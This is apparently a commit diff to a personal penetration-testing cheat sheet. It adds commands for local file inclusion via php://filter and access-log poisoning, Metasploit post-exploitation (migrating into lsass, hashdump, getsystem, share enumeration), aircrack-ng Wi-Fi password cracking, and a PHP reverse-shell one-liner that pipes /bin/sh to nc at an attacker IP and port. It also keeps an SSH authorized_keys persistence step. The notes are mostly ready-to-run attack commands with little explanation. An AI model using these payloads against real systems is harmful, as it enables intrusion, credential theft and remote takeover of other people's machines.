bump
This commit is contained in:
parent
e89be67148
commit
b65298a98c
|
@ -30,4 +30,9 @@ curl 'http://<TARGETIP>/lfi/lfi.php?page=/var/log/apache2/access.log' -H 'Host:
|
||||||
```HTTP
|
```HTTP
|
||||||
curl 'http://<TARGETIP>/lfi/lfi.php?page=/var/log/apache2/access.log&lfi=ls%20../'
|
curl 'http://<TARGETIP>/lfi/lfi.php?page=/var/log/apache2/access.log&lfi=ls%20../'
|
||||||
```
|
```
|
||||||
|
### Base64 Encoding via PHP
|
||||||
|
* Circumvent filter via encoding local files included ins a GET parameter value
|
||||||
|
```http
|
||||||
|
curl http://test.com/test.php?view=php://filter/convert.base64-encode/resource=<fileOnServer>.php
|
||||||
|
```
|
||||||
|
|
||||||
|
|
|
@ -66,9 +66,30 @@ use multi/http/apache_mod_cgi_bash_env_exec
|
||||||
```
|
```
|
||||||
|
|
||||||
## Post Exploitation
|
## Post Exploitation
|
||||||
* Windows
|
|
||||||
* `load kiwi`
|
* `load kiwi`
|
||||||
* `hashdump`
|
* `load python`
|
||||||
|
* Windows
|
||||||
|
* list SAM database
|
||||||
|
```sh
|
||||||
|
migrate <lsass.exe-PID>
|
||||||
|
hashdump
|
||||||
|
```
|
||||||
|
* enum shares
|
||||||
|
```sh
|
||||||
|
post/windows/gather/enum_shares
|
||||||
|
```
|
||||||
* Linux
|
* Linux
|
||||||
* `use post/linux/gather/hashdump`
|
* `use post/linux/gather/hashdump`
|
||||||
|
|
||||||
|
## Other Meterpreter stuff
|
||||||
|
* Staged and in disguise running as another servicename
|
||||||
|
```
|
||||||
|
getpid
|
||||||
|
ps
|
||||||
|
```
|
||||||
|
* Attempt to elevate privileges
|
||||||
|
```sh
|
||||||
|
getsystem
|
||||||
|
```
|
||||||
|
* Use `multi/handler` or exploit and get an overview via `show payloads`
|
||||||
|
* UserID via `getuid`
|
||||||
|
|
|
@ -0,0 +1,20 @@
|
||||||
|
# aircrack-ng
|
||||||
|
|
||||||
|
## airmon-ng
|
||||||
|
|
||||||
|
* Monitor on interface
|
||||||
|
```sh
|
||||||
|
airmon-ng start <interface>
|
||||||
|
```
|
||||||
|
|
||||||
|
## airodump-ng
|
||||||
|
* Capture traffic
|
||||||
|
|
||||||
|
|
||||||
|
## aircrack-ng
|
||||||
|
* Use captured network traffic to crack
|
||||||
|
* Specify targets via common options
|
||||||
|
* Create hashcap files as `HCCAPX` or `HCCAP`
|
||||||
|
```sh
|
||||||
|
aircrack-ng -w <wordlist> -b <bssidFromCapture> -j <outputHashcatFile> <INPUTFILE>
|
||||||
|
```
|
|
@ -29,3 +29,9 @@ python -c 'import pty; pty.spawn("/bin/bash")'
|
||||||
* `ssh-keygen`
|
* `ssh-keygen`
|
||||||
* copy priv key and `chmod 600`
|
* copy priv key and `chmod 600`
|
||||||
* `cat id_rsa.pub > authorized_keys` on target
|
* `cat id_rsa.pub > authorized_keys` on target
|
||||||
|
|
||||||
|
## As Code
|
||||||
|
### PHP
|
||||||
|
```sh
|
||||||
|
<?php exec('rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc <attacker-IP> <attacker-PORT> > /tmp/f') ?>
|
||||||
|
```
|
||||||
|
|
Loading…
Reference in New Issue